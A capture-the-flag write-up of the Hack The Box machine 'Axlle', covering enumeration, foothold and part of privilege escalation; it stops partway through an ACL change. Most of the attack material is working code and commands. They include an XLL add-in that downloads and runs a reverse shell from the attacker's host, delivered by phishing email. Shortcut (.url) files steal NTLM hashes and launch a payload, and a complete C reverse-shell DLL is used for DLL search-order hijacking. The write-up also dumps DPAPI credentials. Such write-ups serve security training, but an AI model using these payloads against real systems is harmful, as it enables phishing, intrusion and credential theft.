# Axlle

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Axlle was a fun, hard-rated Windows machine created by [schex](https://app.hackthebox.com/users/29963)

The foothold involved XLL phishing.  
It also included remote code execution with `.url` files and DACL abuse.  
The lolbin `standalonerunner.exe` had to be exploited for privilege escalation.

## Initial enumeration

```console
opcode@debian$ nmap -v -p- --min-rate 2000 10.10.11.21
Nmap scan report for 10.10.11.21
Host is up (0.081s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT      STATE SERVICE
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49680/tcp open  unknown
53227/tcp open  unknown
62337/tcp open  unknown
```

```console
opcode@debian$ nmap -sC -sV -p 25,53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49673,49674,49675,49680,53227,62337 -oN axlle.nmap 10.10.11.21
Nmap scan report for 10.10.11.21
Host is up (0.082s latency).

PORT      STATE SERVICE       VERSION
25/tcp    open  smtp          hMailServer smtpd
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Axlle Development
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-08-01 20:18:45Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
53227/tcp open  msrpc         Microsoft Windows RPC
62337/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: MAINFRAME; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-08-01T20:19:40
|_  start_date: N/A
|_clock-skew: -8m35s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
```

DNS, Kerberos, SMB, RPC, LDAP, WinRM, and other ports are open. It is likely a DC.
We can start with LDAP enumeration:

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.11.21 -s base -b "" -LLL
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=axlle,DC=htb
ldapServiceName: axlle.htb:mainframe$@AXLLE.HTB
[--SNIP--]
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=axlle,DC=htb
serverName: CN=MAINFRAME,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=axlle,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=axlle,DC=htb
namingContexts: DC=axlle,DC=htb
namingContexts: CN=Configuration,DC=axlle,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=axlle,DC=htb
namingContexts: DC=DomainDnsZones,DC=axlle,DC=htb
namingContexts: DC=ForestDnsZones,DC=axlle,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 168052
dsServiceName: CN=NTDS Settings,CN=MAINFRAME,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=axlle,DC=htb
dnsHostName: MAINFRAME.axlle.htb
defaultNamingContext: DC=axlle,DC=htb
currentTime: 20240801201607.0Z
configurationNamingContext: CN=Configuration,DC=axlle,DC=htb
```

Since the `dnsHostName` is set to FQDN `MAINFRAME.axlle.htb`, we can add it to `/etc/hosts`.

```text
10.10.11.21 MAINFRAME.axlle.htb axlle.htb MAINFRAME
```

## SMB enumeration

I prefer [NetExec](https://github.com/Pennyw0rth/NetExec) to enumerate SMB:

```console
opcode@debian$ docker run -it --entrypoint=/bin/bash --rm --name netexec nxc:latest
root@576e8bcd5c00:~# echo '10.10.11.21 MAINFRAME.axlle.htb axlle.htb MAINFRAME' >> /etc/hosts
```

Null sessions are disabled:

```console
root@576e8bcd5c00:~# nxc smb 10.10.11.21 -d axlle.htb -u '' -p '' --shares
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.21     445    MAINFRAME        [+] axlle.htb\: 
SMB         10.10.11.21     445    MAINFRAME        [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

Guest sessions are also disabled:

```console
root@576e8bcd5c00:~# nxc smb 10.10.11.21 -d axlle.htb -u 'opcode' -p '' --shares
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.21     445    MAINFRAME        [-] axlle.htb\opcode: STATUS_LOGON_FAILURE 
```

I also ran [enum4linux-ng](https://github.com/cddmp/enum4linux-ng) for rpcclient enumeration, but it wasn't helpful.

## XLL Phishing

On the website, we're greeted with this message:

![1](images/1.png)

The image for the box, the availability of the SMTP port, and the above message all suggest phishing.  
Since macros are not allowed, we can attempt [XLL Phishing](https://github.com/Octoberfest7/XLL_Phishing).  
If no AV is present on the box, or the attachments are being uploaded to an excluded folder, we can work with something even [simpler](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xll-exec)

```c
#include <windows.h>

__declspec(dllexport) void __cdecl xlAutoOpen(void); 

void __cdecl xlAutoOpen() {
    WinExec("powershell.exe IEX(IWR http://10.10.14.185:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.185 9001", SW_HIDE);
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

We can compile it directly on a linux machine:

```console
opcode@debian$ x86_64-w64-mingw32-gcc -shared -o opcode.xll dllmain.c
```

For mailing it as an attachment, `swaks` can be used:

```console
opcode@debian$ sudo apt install swaks
opcode@debian$ swaks --to accounts@axlle.htb --from opcode@10.10.14.185 --header "Subject: Urgent" --body "Opcode" --attach @opcode.xll --server MAINFRAME.axlle.htb
```

I shortly obtained a shell as `gideon.hamill`:

```console
PS C:\> whoami
axlle\gideon.hamill
```

## Post-shell AD enumeration

```console
PS C:\> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== =============================================
axlle\gideon.hamill S-1-5-21-1005535646-190407494-3473065389-1113


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users              Alias            S-1-5-32-559                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
AXLLE\Accounts                             Group            S-1-5-21-1005535646-190407494-3473065389-1104 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees                            Group            S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

Nothing useful here.

```console
PS C:\> netstat -ano -p TCP | findstr LISTENING
  TCP    0.0.0.0:25             0.0.0.0:0              LISTENING       2620
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:110            0.0.0.0:0              LISTENING       2620
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       908
  TCP    0.0.0.0:143            0.0.0.0:0              LISTENING       2620
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:587            0.0.0.0:0              LISTENING       2620
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       908
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2504
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       532
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1208
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1592
  TCP    0.0.0.0:49673          0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:49674          0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:49675          0.0.0.0:0              LISTENING       2396
  TCP    0.0.0.0:49680          0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:49681          0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:53227          0.0.0.0:0              LISTENING       2496
  TCP    0.0.0.0:62337          0.0.0.0:0              LISTENING       2524
  TCP    10.10.11.21:53         0.0.0.0:0              LISTENING       2496
  TCP    10.10.11.21:139        0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       2496
```

Ports 110, 143, and 587 were not exposed, but they are all related to mailing.  
I tried getting `gideon.hamill`'s Net-NTLMv2 challenge next:

```console
C:\> net use \\10.10.14.185\opcode
```

In `Responder`, I captured a Net-NTLMv2 challenge:

```console
[SMB] NTLMv2-SSP Client   : 10.10.11.21
[SMB] NTLMv2-SSP Username : AXLLE\gideon.hamill
[SMB] NTLMv2-SSP Hash     : gideon.hamill::AXLLE:4c8d14a593f7a6ff:FCCFC6A5C4CEF1662F5CA04841885E67:01010000000000008043DA3EC6E4DA014DC4FF0BE35FCB3100000000020008004C0045005700550001001E00570049004E002D0042004900340057005A0058005400440039004600350004003400570049004E002D0042004900340057005A005800540044003900460035002E004C004500570055002E004C004F00430041004C00030014004C004500570055002E004C004F00430041004C00050014004C004500570055002E004C004F00430041004C00070008008043DA3EC6E4DA01060004000200000008003000300000000000000001000000002000001F0118797CF71EF6FA5352B85F77592A0FCB221E30D47FB5BA9CAC705A14F8440A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00360037000000000000000000
```

It did not crack as `gideon.hamill`'s password is not present in `rockyou.txt`  
I tried running [adPEAS](https://github.com/61106960/adPEAS):

```console
PS C:\Windows\Tasks> IEX(IWR http://10.10.14.185:8000/adPEAS.ps1 -UseBasicParsing)
PS C:\Windows\Tasks> Invoke-adPEAS
```

Nothing interesting came out.  
I also ran [PrivescCheck](https://github.com/itm4n/PrivescCheck):

```console
PS C:\Windows\Tasks> IEX(IWR http://10.10.14.185:8000/PrivescCheck.ps1 -UseBasicParsing)
PS C:\Windows\Tasks> Invoke-PrivescCheck -Extended
```

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ Service list (non-default)                        ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about third-party services. It does so by    ┃
┃ parsing the target executable's metadata and checking        ┃
┃ whether the publisher is Microsoft.                          ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational


Name        : hMailServer
DisplayName : hMailServer
ImagePath   : "C:\Program Files (x86)\hMailServer\Bin\hMailServer.exe" RunAsService
User        : LocalSystem
StartMode   : Automatic
```

`hMailServer` is running.

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0043 - Reconnaissance                           ┃
┃ NAME     ┃ Application list (non-default)                    ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about non-default and third-party            ┃
┃ applications by searching the registry and the default       ┃
┃ install locations.                                           ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational

Name                                 FullName
----                                 --------
hMailServer                          C:\Program Files (x86)\hMailServer
Microsoft                            C:\Program Files (x86)\Microsoft
Microsoft SQL Server Compact Edition C:\Program Files (x86)\Microsoft SQL Server Compact Edition
Microsoft Synchronization Services   C:\Program Files (x86)\Microsoft Synchronization Services
Windows Kits                         C:\Program Files (x86)\Windows Kits
Microsoft                            C:\Program Files\Microsoft
Microsoft Office                     C:\Program Files\Microsoft Office
VMware                               C:\Program Files\VMware
VMware Tools                         C:\Program Files\VMware\VMware Tools
Windows Kits                         C:\Program Files\Windows Kits
```

Microsoft Office is installed as expected.

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0006 - Credential Access                        ┃
┃ NAME     ┃ Credential files                                  ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about the current user's CREDENTIAL files.   ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational


Type     : Credentials
FullPath : C:\Users\gideon.hamill\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

Type     : Protect
FullPath : C:\Users\gideon.hamill\AppData\Roaming\Microsoft\Protect\S-1-5-21-1005535646-190407494-3473065389-1113\52d1fa8c-4ee4-4b10-940b-ee2bf2d59939
```

DPAPI secrets are present.

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0005 - Defense Evasion                          ┃
┃ NAME     ┃ Windows Defender exclusions                       ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about the exclusions configured in Microsoft ┃
┃ Defender.                                                    ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational

Source   Type      Value
------   ----      -----
EventLog Path      C:\Windows\System32\rundll32.exe
EventLog Path      C:\Windows\System32\rundll32.exe
EventLog Process   rundll32.exe
EventLog Process   rundll32.exe
EventLog Path      C:\Windows\System32\spool\drivers\color
EventLog Path      C:\Windows\Temp
EventLog Extension xll
```

Exclusions have been set up for Defender. However, real-time monitoring was disabled.

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ User sessions                                     ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about the currently logged-on users. Note    ┃
┃ that it might be possible to capture or relay the            ┃
┃ NTLM/Kerberos authentication of these users (RemotePotato0,  ┃
┃ KrbRelay).                                                   ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational

SessionName UserName            Id        State
----------- --------            --        -----
Services                         0 Disconnected
Console     AXLLE\Administrator  1       Active
```

Administrator has a session 1 shell.

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0043 - Reconnaissance                           ┃
┃ NAME     ┃ User home folders                                 ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about the local home folders and check       ┃
┃ whether the current user has read or write permissions.      ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational

HomeFolderPath             Read  Name
--------------             ----  ----
C:\Users\Administrator    False False
C:\Users\baz.humphries    False False
C:\Users\brad.shaw         True  True
C:\Users\calum.scott      False False
C:\Users\dallon.matrix    False False
C:\Users\dan.kendo        False False
C:\Users\gideon.hamill     True  True
C:\Users\jacob.greeny     False False
C:\Users\lindsay.richards  True  True
C:\Users\Public            True  True
C:\Users\simon.smalls      True  True
C:\Users\trent.langdon    False False
```

The current user can also read the home folder for some other users.  
I peeked inside their home directories, but they were mostly empty.

I used [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI) to decrypt the masterkey and retrieve the DPAPI credential.  
Even without the credentials, we can ask the domain controller to decrypt the masterkey with `/rpc`:

```console
PS C:\Windows\Tasks> iwr 10.10.14.185:8000/SharpDPAPI.exe -o SharpDPAPI.exe
PS C:\Windows\Tasks> .\SharpDPAPI.exe credentials /rpc

  __                 _   _       _ ___ 
 (_  |_   _. ._ ._  | \ |_) /\  |_) |  
 __) | | (_| |  |_) |_/ |  /--\ |  _|_ 
                |
  v1.12.0


[*] Action: User DPAPI Credential Triage

[*] Will ask a domain controller to decrypt masterkeys for us

[*] Found MasterKey : C:\Users\gideon.hamill\AppData\Roaming\Microsoft\Protect\S-1-5-21-1005535646-190407494-3473065389-1113\52d1fa8c-4ee4-4b10-940b-ee2bf2d59939

[*] Preferred master keys:

C:\Users\gideon.hamill\AppData\Roaming\Microsoft\Protect\S-1-5-21-1005535646-190407494-3473065389-1113:52d1fa8c-4ee4-4b10-940b-ee2bf2d59939

[*] User master key cache:

{52d1fa8c-4ee4-4b10-940b-ee2bf2d59939}:18C661793305D15BF0DE670BFB4B87FD44EDF4E8


[*] Triaging Credentials for current user


Folder       : C:\Users\gideon.hamill\AppData\Local\Microsoft\Credentials\

  CredFile           : DFBE70A7E5CC19A398EBF1B96859CE5D

    guidMasterKey    : {52d1fa8c-4ee4-4b10-940b-ee2bf2d59939}
    size             : 11020
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
    description      : Local Credential Data

    LastWritten      : 1/1/2024 4:15:54 AM
    TargetName       : WindowsLive:target=virtualapp/didlogical
    TargetAlias      :
    Comment          : PersistedCredential
    UserName         : 02ibadauxfvernpc
    Credential       :
```

It was a dud.

I looked inside the `hMailServer` install directory:

```console
PS C:\Program Files (x86)\hMailServer> cat .\Bin\hMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=52a1b2a1211e690998e0d2ccb653ff22
[Database]
Type=MSSQLCE
Username=
Password=52abe4d2e16269ddddf7b166218e92d9
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
```

The `AdministratorPassword` did not crack on <https://crackstation.net/>. Without it, the `Password` cannot be decrypted either.  
Inside `\Data\`, I found an email belonging to `dallon.matrix`:

```console
PS C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F> cat '.\{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml'
Return-Path: webdevs@axlle.htb
Received: from bumbag (Unknown [192.168.77.153])
 by MAINFRAME with ESMTP
 ; Mon, 1 Jan 2024 06:32:24 -0800
Date: Tue, 02 Jan 2024 01:32:23 +1100
To: dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb
From: webdevs@axlle.htb
Subject: OSINT Application Testing
Message-Id: <20240102013223.019081@bumbag>
X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/

Hi everyone,

The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.

We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.

Yours in click-worthy URLs,

The Web Dev Team
```

It means we can create a `.url` file in `C:\inetpub\testing` to steal hashes:

```console
$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("C:\inetpub\testing\Opcode.url")
$Shortcut.TargetPath = "http://10.10.14.185/abcd"
$Shortcut.Save()
```

I received hits, but no credentials. I replaced the URL with a UNC path:

```console
$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("C:\inetpub\testing\Opcode.url")
$Shortcut.TargetPath = "\\10.10.14.185\opcode"
$Shortcut.Save()
```

I received `dallon.matrix`'s encrypted Net-NTLMv2 challenge:

```text
[SMB] NTLMv2-SSP Client   : 10.10.11.21
[SMB] NTLMv2-SSP Username : AXLLE\dallon.matrix
[SMB] NTLMv2-SSP Hash     : dallon.matrix::AXLLE:8577f6dbc3311a6d:16B05B073174915B228A4C428B6E623A:0101000000000000808DEC08CDE4DA01A1E3861670070AE000000000020008004E0042005900430001001E00570049004E002D004D005400440030004400380052004D0050003400490004003400570049004E002D004D005400440030004400380052004D005000340049002E004E004200590043002E004C004F00430041004C00030014004E004200590043002E004C004F00430041004C00050014004E004200590043002E004C004F00430041004C0007000800808DEC08CDE4DA01060004000200000008003000300000000000000001000000002000001F0118797CF71EF6FA5352B85F77592A0FCB221E30D47FB5BA9CAC705A14F8440A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00360037000000000000000000
```

It did not crack because the password is not present in `rockyou.txt`  
We can also get remote code execution with `.url` files sometimes. I created a simple reverse shell executable and placed it in `C:\Windows\Tasks`.  
(I used the code under `C Windows` from <https://www.revshells.com/>: [revshell.c](revshell.c) )

```console
opcode@debian$ x86_64-w64-mingw32-gcc -o revshell.exe revshell.c -lws2_32
```

I also added the ACL `FullControl` for `Everyone`:

```console
PS C:\Windows\Tasks> iwr 10.10.14.185:8000/revshell.exe -o revshell.exe
PS C:\Windows\Tasks> $acl = Get-Acl C:\Windows\Tasks\revshell.exe
PS C:\Windows\Tasks> $fileSystemAccessRule = New-Object System.Security.AccessControl.FileSystemAccessRule("Everyone", "FullControl", "Allow")
PS C:\Windows\Tasks> $acl.SetAccessRule($fileSystemAccessRule)
PS C:\Windows\Tasks> Set-Acl C:\Windows\Tasks\revshell.exe $acl
```

Finally, I created the `.url` file:

```console
$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("C:\inetpub\testing\Opcode.url")
$Shortcut.TargetPath = 'file:"C:\\Windows\\Tasks\\revshell.exe"'
$Shortcut.Save()
```

The file was generated:

```console
PS C:\Windows\Tasks> cat C:\inetpub\testing\Opcode.url
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9
[InternetShortcut]
IDList=
URL=file:"C://Windows//Tasks//revshell.exe"
```

And I obtained a shell as `dallon.matrix`:

```console
C:\> whoami
axlle\dallon.matrix
```

I was referring to [Shortcut To Malice: URL Files](https://inquest.net/blog/shortcut-to-malice-url-files/) to learn how malicious actors exploit the `.url` files.  
One of the tricks stood out from the rest: [DLL Hijacking via URL files](https://insert-script.blogspot.com/2018/05/dll-hijacking-via-url-files.html). I wanted to try out this approach as well.  
The `.url` format has not been officially documented, but some unofficial attempts have been made. Out of the documented parameters, the `WorkingDirectory` parameter is particularly interesting. It errors out when I try to set it on a `.url` file with `Wscript.Shell`:

```console
PS C:\inetpub\testing> $Shortcut.WorkingDirectory = "C:\Windows\System32\"
Exception setting "WorkingDirectory": "The property 'WorkingDirectory' cannot 
be found on this object. Verify that the property exists and can be set."
```

However, it seems to be functional and can be used for code execution with DLL search order hijack.  
`WinSxS` is a gold mine to find potential target executables: (Side-by-Side with HelloJackHunter: Unveiling the Mysteries of WinSxS)[https://blog.zsec.uk/hellojackhunter-exploring-winsxs/]  
I used `C:\Windows\WinSxS\amd64_netfx4-ngentask_exe_b03f5f7f11d50a3a_4.0.15806.0_none_d4049e1f6926b032\ngentask.exe`)  
It can be exploited with a DLL named `mscorsvc.dll`

First, I compiled a DLL to return a reverse shell: [dllmain.c](dllmain.c)

```c
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#pragma comment(lib,"ws2_32")

WSADATA wsaData;
SOCKET Winsock;
struct sockaddr_in hax; 
char ip_addr[16] = "10.10.14.185"; 
char port[6] = "9001";            

STARTUPINFO ini_processo;

PROCESS_INFORMATION processo_info;

int pwn()
{
    WSAStartup(MAKEWORD(2, 2), &wsaData);
    Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);


    struct hostent *host; 
    host = gethostbyname(ip_addr);
    strcpy_s(ip_addr, 16, inet_ntoa(*((struct in_addr *)host->h_addr)));

    hax.sin_family = AF_INET;
    hax.sin_port = htons(atoi(port));
    hax.sin_addr.s_addr = inet_addr(ip_addr);

    WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);

    memset(&ini_processo, 0, sizeof(ini_processo));
    ini_processo.cb = sizeof(ini_processo);
    ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; 
    ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;

    TCHAR cmd[255] = TEXT("cmd.exe");

    CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);

    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        pwn();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

```console
opcode@debian$ x86_64-w64-mingw32-gcc -shared -o mscorsvc.dll dllmain.c -lws2_32
```

We can upload and test that it is working:

```console
PS C:\Windows\Tasks> iwr 10.10.14.185:8000/mscorsvc.dll -o mscorsvc.dll
PS C:\Windows\Tasks> C:\Windows\WinSxS\amd64_netfx4-ngentask_exe_b03f5f7f11d50a3a_4.0.15806.0_none_d4049e1f6926b032\ngentask.exe
```

I also added the ACL `FullControl` for `Everyone`:

```console
PS C:\Windows\Tasks> $acl = Get-Acl C:\Windows\Tasks\mscorsvc.dll
